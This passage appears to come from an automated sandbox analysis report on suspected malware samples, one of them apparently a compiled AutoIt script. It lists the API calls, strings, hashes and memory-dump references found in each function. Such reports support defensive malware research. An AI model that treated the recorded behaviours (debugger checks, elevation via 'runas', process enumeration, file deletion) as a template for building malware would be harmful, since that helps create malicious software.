String ID: RMDir: RemoveDirectory invalid input("")
API String ID: 3509786178-2769509956
Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E

Function 00405DE2 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24

Memory Dump Source

Source File: 00000002.00000002.2113977143.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2113923102.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2113997534.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114218450.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4

Analysis Process: Climb.comPID: 6172, Parent PID: 5840COMMON

Execution Graph

Execution Coverage:	3.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.2%
Total number of Nodes:	2000
Total number of Limit Nodes:	59

Executed Functions

Function 00485FC8 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 236
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00485FF7

Part of subcall function 00488577: _wcslen.LIBCMT ref: 0048858A

GetCurrentProcess.KERNEL32(?,0051DC2C,00000000,?,?), ref: 00486123
IsWow64Process.KERNEL32(00000000,?,?), ref: 0048612A
LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00486155
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00486167
GetNativeSystemInfo.KERNEL32(?,?,?), ref: 00486175
FreeLibrary.KERNEL32(00000000,?,?), ref: 0048617C
GetSystemInfo.KERNEL32(?,?,?), ref: 004861A1

Strings

GetNativeSystemInfo, xrefs: 00486161
|O, xrefs: 004C50F7
kernel32.dll, xrefs: 00486150

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
String ID: GetNativeSystemInfo$kernel32.dll$|O
API String ID: 3290436268-3101561225
Opcode ID: a76ec3bff338bc6d626c9f1ae211093234781461affe43792ffeb9e3a2da0b7d
Instruction ID: 5164d13b9afe4d5520528223b687d6dc8c9bde738cf75aa581fd6e64692b2f11
Opcode Fuzzy Hash: a76ec3bff338bc6d626c9f1ae211093234781461affe43792ffeb9e3a2da0b7d
Instruction Fuzzy Hash: 78A1A23680A3C0CFC751DB687C656993FA46B37342F1A5C9ED484A3223C62D458CEB3A

Function 0048338B Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 148
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00483368,?), ref: 004833BB
IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00483368,?), ref: 004833CE
GetFullPathNameW.KERNEL32(00007FFF,?,?,00552418,00552400,?,?,?,?,?,?,00483368,?), ref: 0048343A

Part of subcall function 00488577: _wcslen.LIBCMT ref: 0048858A

Part of subcall function 0048425F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00483462,00552418,?,?,?,?,?,?,?,00483368,?), ref: 004842A0

SetCurrentDirectoryW.KERNEL32(?,00000001,00552418,?,?,?,?,?,?,?,00483368,?), ref: 004834BB
MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 004C3CB0
SetCurrentDirectoryW.KERNEL32(?,00552418,?,?,?,?,?,?,?,00483368,?), ref: 004C3CF1
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,005431F4,00552418,?,?,?,?,?,?,?,00483368), ref: 004C3D7A
ShellExecuteW.SHELL32(00000000,?,?), ref: 004C3D81

Part of subcall function 004834D3: GetSysColorBrush.USER32(0000000F), ref: 004834DE
Part of subcall function 004834D3: LoadCursorW.USER32(00000000,00007F00), ref: 004834ED
Part of subcall function 004834D3: LoadIconW.USER32(00000063), ref: 00483503
Part of subcall function 004834D3: LoadIconW.USER32(000000A4), ref: 00483515
Part of subcall function 004834D3: LoadIconW.USER32(000000A2), ref: 00483527
Part of subcall function 004834D3: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 0048353F
Part of subcall function 004834D3: RegisterClassExW.USER32(?), ref: 00483590

Part of subcall function 004835B3: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 004835E1
Part of subcall function 004835B3: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00483602
Part of subcall function 004835B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00483368,?), ref: 00483616
Part of subcall function 004835B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00483368,?), ref: 0048361F

Part of subcall function 0048396B: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00483A3C

Strings

runas, xrefs: 004C3D75
It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 004C3CAA
AutoIt, xrefs: 004C3CA5
0$U, xrefs: 00483495

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
String ID: 0$U$AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
API String ID: 683915450-1359138020
Opcode ID: e1ea4d8ea745dc91c81c033905ab3d9a304cc9cdecbc6877b30066cd68de93e8
Instruction ID: 664f696b22f282fdcaed960665ddc21b009572e173decb454efd0afcf2beb3ba
Opcode Fuzzy Hash: e1ea4d8ea745dc91c81c033905ab3d9a304cc9cdecbc6877b30066cd68de93e8
Instruction Fuzzy Hash: 51510B31108340AACB01FF619C11DAE7FB4AFA1B4AF004C1FF591561A2DB6C964DD76B

Function 004EDC54 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00485851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004855D1,?,?,004C4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00485871

Part of subcall function 004EEAB0: GetFileAttributesW.KERNEL32(?,004ED840), ref: 004EEAB1

FindFirstFileW.KERNEL32(?,?), ref: 004EDCCB
DeleteFileW.KERNEL32(?,?,?,?), ref: 004EDD1B
FindNextFileW.KERNELBASE(00000000,00000010), ref: 004EDD2C
FindClose.KERNEL32(00000000), ref: 004EDD43
FindClose.KERNEL32(00000000), ref: 004EDD4C

Strings

\*.*, xrefs: 004EDC9D

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: 5eb79361a05bc322c2ed82042210bca936997c6e45281d95ff837d4738f40b45
Instruction ID: 6c96ffa9e09d36adc7400bebe91a03d22cf1358c8bebe610f25755ffa3532800
Opcode Fuzzy Hash: 5eb79361a05bc322c2ed82042210bca936997c6e45281d95ff837d4738f40b45
Instruction Fuzzy Hash: 62316131408385AFC301FB21CC418EFB7E8AE95309F404D1EF5E682191EB28D909D7AB

Function 004EDD87 Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 004EDDAC
Process32FirstW.KERNEL32(00000000,?), ref: 004EDDBA
Process32NextW.KERNEL32(00000000,?), ref: 004EDDDA
CloseHandle.KERNEL32(00000000), ref: 004EDE87

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 7dc95c8ff8e965fbd051b3dd8f5e84fdcaf5d3245426da8565a2be8d14127113
Instruction ID: 5796046c9b7d675ce1903c78e800a6981560149fd9cc511453ac3999d7d9a280
Opcode Fuzzy Hash: 7dc95c8ff8e965fbd051b3dd8f5e84fdcaf5d3245426da8565a2be8d14127113
Instruction Fuzzy Hash: 33319171408340AFD311EF55CC85AAFBBF8EF99344F04092EF581871A1EB759949CB96

Function 0049AC3E Relevance: 91.7, APIs: 1, Strings: 51, Instructions: 671
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

MouseCoordMode, xrefs: 0049AE19
WinDetectHiddenText, xrefs: 0049B004
MouseClickDownDelay, xrefs: 0049ADF8
ExpandEnvStrings, xrefs: 0049AD35
MustDeclareVars, xrefs: 0049AE2B
GUIResizeMode, xrefs: 0049ADCC
CaretCoordMode, xrefs: 0049AD29
d0#2, xrefs: 0049AFE3
SendCapsLockMode, xrefs: 0049AF40
SetExitCode, xrefs: 0049AF63
d5m0, xrefs: 0049AE75
GUIEventOptions, xrefs: 0049AD95
TrayIconHide, xrefs: 0049AFB4
SendKeyDelay, xrefs: 0049AF4D
(U, xrefs: 0049ADC1
d100m0, xrefs: 0049AF7D
TCPTimeout, xrefs: 0049AF72
TrayIconDebug, xrefs: 0049AF9E
PixelCoordMode, xrefs: 0049AE3D
d1r1,2, xrefs: 0049B025
SendKeyDownDelay, xrefs: 0049AF58
TrayOnEventMode, xrefs: 0049AFEE
d0r0,1023, xrefs: 0049ADE2
d1b, xrefs: 0049AD55, 0049AE8E
GUICoordMode, xrefs: 0049AD5D
(U, xrefs: 0049AD4D
MouseClickDragDelay, xrefs: 0049AE03
GUIOnEventMode, xrefs: 0049ADB6
TrayAutoPause, xrefs: 0049AF88
d250m0, xrefs: 0049AE0E, 0049B058
(U, xrefs: 0049AD65
MouseClickDelay, xrefs: 0049ADED
SendAttachMode, xrefs: 0049AE56
WinSearchChildren, xrefs: 0049B00F
d0#1, xrefs: 0049AFC6
i, xrefs: 0049B0A3
GUICloseOnESC, xrefs: 0049AD45
(U, xrefs: 0049ADD7
d1#3, xrefs: 0049B042
d124c, xrefs: 0049AD8A
d1r0,2, xrefs: 0049ACA9
d0b, xrefs: 0049AC96, 0049AD10, 0049AEA7
d10m0, xrefs: 0049ACF0
TrayMenuMode, xrefs: 0049AFD1
`*U, xrefs: 0049AFF9
d0r0,3, xrefs: 0049ADAB
ExpandVarStrings, xrefs: 0049AD3D
WinTextMatchMode, xrefs: 0049B01A
GUIDataSeparatorChar, xrefs: 0049AD74
WinTitleMatchMode, xrefs: 0049B030
e#U, xrefs: 0049AFA9

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID:
String ID: CaretCoordMode$ExpandEnvStrings$ExpandVarStrings$GUICloseOnESC$GUICoordMode$GUIDataSeparatorChar$GUIEventOptions$GUIOnEventMode$GUIResizeMode$MouseClickDelay$MouseClickDownDelay$MouseClickDragDelay$MouseCoordMode$MustDeclareVars$PixelCoordMode$SendAttachMode$SendCapsLockMode$SendKeyDelay$SendKeyDownDelay$SetExitCode$TCPTimeout$TrayAutoPause$TrayIconDebug$TrayIconHide$TrayMenuMode$TrayOnEventMode$WinDetectHiddenText$WinSearchChildren$WinTextMatchMode$WinTitleMatchMode$`*U$d0#1$d0#2$d0b$d0r0,1023$d0r0,3$d1#3$d100m0$d10m0$d124c$d1b$d1r0,2$d1r1,2$d250m0$d5m0$e#U$i$(U$(U$(U$(U
API String ID: 0-3261771594
Opcode ID: 749e66021fcdf0df679a012af1d99a26a2fe27ddae8fd9d68032a37e50cf7270
Instruction ID: 9196e7f0a7c15ed572a629f1166b0e102083729203905bb11773c5a8b419e5f4
Opcode Fuzzy Hash: 749e66021fcdf0df679a012af1d99a26a2fe27ddae8fd9d68032a37e50cf7270
Instruction Fuzzy Hash: 156266705083419FC724DF15D1A5AAABBE0FF89308F10896FE4898B351DB74E989CF96

Function 00483624 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00483657
RegisterClassExW.USER32(00000030), ref: 00483681
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00483692
InitCommonControlsEx.COMCTL32(?), ref: 004836AF
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004836BF
LoadIconW.USER32(000000A9), ref: 004836D5
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 004836E4

Strings

+, xrefs: 00483640
AutoIt v3 GUI, xrefs: 00483673
0+m"H, xrefs: 0048366C
0, xrefs: 00483639
TaskbarCreated, xrefs: 00483687

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$0+m"H$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-793170436
Opcode ID: c8d6d4b8c2824b442fe8fa489018a624c370da575d5915314c43932d563216a2
Instruction ID: 8c8a63ee9f56a1cc1df4847ca00eaf8edbabe63d82d058fa0924d6855facb6b6
Opcode Fuzzy Hash: c8d6d4b8c2824b442fe8fa489018a624c370da575d5915314c43932d563216a2
Instruction Fuzzy Hash: 4F21D6B5D01318AFDB00DFA4EC89BDDBBB4FB29711F00811AF511A62A0D7B54588EFA4

Function 004852A7 Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00485594: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,004C4B76,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 004855B2

Part of subcall function 00485238: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0048525A

RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 004853C4
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 004C4BFD
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 004C4C3E
RegCloseKey.ADVAPI32(?), ref: 004C4C80
_wcslen.LIBCMT ref: 004C4CE7
_wcslen.LIBCMT ref: 004C4CF6

Strings

Software\AutoIt v3\AutoIt, xrefs: 004853BA
\Include\, xrefs: 00485381
vGN, xrefs: 00485342
\, xrefs: 004C4CFC
Include, xrefs: 004C4BF4, 004C4C35

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\$vGN
API String ID: 98802146-1983001349
Opcode ID: 22694f3ab01771e505c2f9edbc486e54fc00f1b65873c1cf5a89824c55b66511
Instruction ID: d201a95c49448749dfc51963dcdf0d520e3560bc8ab2b78cfd005c1053776d27
Opcode Fuzzy Hash: 22694f3ab01771e505c2f9edbc486e54fc00f1b65873c1cf5a89824c55b66511
Instruction Fuzzy Hash: F4719F71104301AEC700EF66E8A599FBBF8FFA8384F41482EF44987170EB759A49DB95

Function 0048370F Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 145
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00483709,?,?), ref: 00483777
KillTimer.USER32(?,00000001,?,?,?,?,?,00483709,?,?), ref: 004837A3
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004837C6
RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00483709,?,?), ref: 004837D1
CreatePopupMenu.USER32 ref: 004837E5
PostQuitMessage.USER32(00000000), ref: 00483806

Strings

0$U, xrefs: 004C3DA9
0$U, xrefs: 004C3DF7
TaskbarCreated, xrefs: 004837CC

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: 0$U$0$U$TaskbarCreated
API String ID: 129472671-4272936049
Opcode ID: 07ceec1dab3e67200d1af947e37fed63887e71095745fdc62f817bdc72778828
Instruction ID: 9e2368fe1b270c8c586c26e06c3d9dab83b0df45b9c2c8ff1abdefc6c1bd1348
Opcode Fuzzy Hash: 07ceec1dab3e67200d1af947e37fed63887e71095745fdc62f817bdc72778828
Instruction Fuzzy Hash: C941D8F5100244B6DB143F28CC69BBE3BB5E715B07F00C92BF90695390DA6CDB49A76A

Function 004C09DB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004C071A: CreateFileW.KERNEL32(00000000,00000000,?,004C0A84,?,?,00000000,?,004C0A84,00000000,0000000C), ref: 004C0737

GetLastError.KERNEL32 ref: 004C0AEF
__dosmaperr.LIBCMT ref: 004C0AF6
GetFileType.KERNEL32(00000000), ref: 004C0B02
GetLastError.KERNEL32 ref: 004C0B0C
__dosmaperr.LIBCMT ref: 004C0B15
CloseHandle.KERNEL32(00000000), ref: 004C0B35
CloseHandle.KERNEL32(?), ref: 004C0C7F
GetLastError.KERNEL32 ref: 004C0CB1
__dosmaperr.LIBCMT ref: 004C0CB8

Strings

H, xrefs: 004C0C3D

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 64f7f21929ceb87dc5ed7f196ff2725ae1fb9183468e3efca624be3e85dfbc58
Instruction ID: 54e2d41621800c0a24dca5bf79a10283ac984a616fde0493f39a2b236c543c17
Opcode Fuzzy Hash: 64f7f21929ceb87dc5ed7f196ff2725ae1fb9183468e3efca624be3e85dfbc58
Instruction Fuzzy Hash: C0A13836A00204DFDF18EFA8D851BAE7BA0AB16324F14015EF811DB3D1D7399D06CB69

Function 004834D3 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 004834DE
LoadCursorW.USER32(00000000,00007F00), ref: 004834ED
LoadIconW.USER32(00000063), ref: 00483503
LoadIconW.USER32(000000A4), ref: 00483515
LoadIconW.USER32(000000A2), ref: 00483527
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 0048353F
RegisterClassExW.USER32(?), ref: 00483590

Part of subcall function 00483624: GetSysColorBrush.USER32(0000000F), ref: 00483657
Part of subcall function 00483624: RegisterClassExW.USER32(00000030), ref: 00483681
Part of subcall function 00483624: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00483692
Part of subcall function 00483624: InitCommonControlsEx.COMCTL32(?), ref: 004836AF
Part of subcall function 00483624: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004836BF
Part of subcall function 00483624: LoadIconW.USER32(000000A9), ref: 004836D5
Part of subcall function 00483624: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 004836E4

Strings

AutoIt v3, xrefs: 0048357F
#, xrefs: 00483566
0, xrefs: 0048355F

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 5be532aa75bc6ade5bfd56b6d6d14616c63c42192086673ec6f0a947fe761fa7
Instruction ID: ac8cc7c1dbd677dae819a5ee3da96d17305fd8b0fbfffffbe4ad95b654149782
Opcode Fuzzy Hash: 5be532aa75bc6ade5bfd56b6d6d14616c63c42192086673ec6f0a947fe761fa7
Instruction Fuzzy Hash: EB215070E00314ABDB109FA5EC65B9D7FF4FB19B52F01441AF604A62A0D3B90548EF94

Function 00500FB8 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32(00000101,?), ref: 00501019
inet_addr.WSOCK32(?), ref: 00501079
gethostbyname.WS2_32(?), ref: 00501085
IcmpCreateFile.IPHLPAPI ref: 00501093
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00501123
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00501142
IcmpCloseHandle.IPHLPAPI(?), ref: 00501216
WSACleanup.WSOCK32 ref: 0050121C

Strings

Ping, xrefs: 005010D3

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
